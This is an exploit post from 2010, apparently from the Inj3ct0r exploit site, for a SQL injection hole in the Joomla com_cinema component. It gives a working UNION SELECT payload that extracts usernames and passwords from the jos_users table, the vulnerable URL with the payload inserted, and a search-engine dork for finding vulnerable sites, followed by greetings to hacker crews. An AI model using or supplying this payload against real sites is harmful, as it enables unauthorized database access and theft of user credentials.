Joomla Component com_cinema SQL Injection Vulnerability
Posted on 09 June 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Joomla Component com_cinema SQL Injection Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>======================================================= Joomla Component com_cinema SQL Injection Vulnerability ======================================================= # Exploit Title: joomla component cinema SQL injection Vulnerability # Date: 09 juny 2010 # Author: Sudden_death (suddendeath404@yahoo.com) # Software Link: N/A # Tested on: Windows XP 2 # Platform / Tested on: Windows XP 2 SP 2 # myweb : http://sudden.isgreat.org/ # dork : inurl:option=com_cinema ====================================================================== # EXPLOIT / c0de -99999 /**/ union /**/ select /**/ 0,1,0x3a,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18, 19,20,21,22,23,24,25,26,27,28,29,30,31,32,concat(username,0x3a,password) /**/ from /**/ jos_users-- # VULN IN HERE http://www.site.com/index.php?option=com_cinema&Itemid=S@BUN&func=detail&id=[exploit] # LIVE DEMO http://www.site.com/index.php?option=com_cinema&Itemid=S@BUN&func=deta%20il&id=-99999 /**/ union /**/ select /**/ 0,1,0x3a,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,%2019,20,21,22,23,24,25,26,27,28,29,30,31,32,concat(username,0x3a,password) /**/ from /**/ jos_users-- [#]------------------------------------------------------------------- GREETZ TO WE FORUM: -=-[ indonesianhacker.or.id | tecon-crew.org | devilzc0de.org ]-=- [#]------------------------------------------------------------------- MY BROTHA : | bumble_be | Mr.SoOofe | BobyPutrA | Syst3m_RtO | MISTERFRIBO | CS-31 | d43ngCyb3r | zee eichel | ne0 d4rk fl00d3r | Ichito-Bandito | | james0baster | kaMtiEz | Man In Black | otong | r3m1ck's | shadowsmaker | SyNTaX ErRoR | iJoo | FLYFF666 | LOL1ds | Md_holic | cah_surip | | angga | demnas | ELV1N4 | hateback | virgi | scr34mz | Kimmonosz | pL4nkt0n | RxN7 | z0mb13 | 45tr0_k1ll1n9 | huda_style | zalezero | CireSoft49 | | r4tu_le64h | huda_style | ranggamagic | maximize13 | and you | [#]------------------------------------------------------------------- note :jangan mengatakan setiap apa yang engkau ketahui tapi ketahuilah setiap apa yang kau katakan! # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-09]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
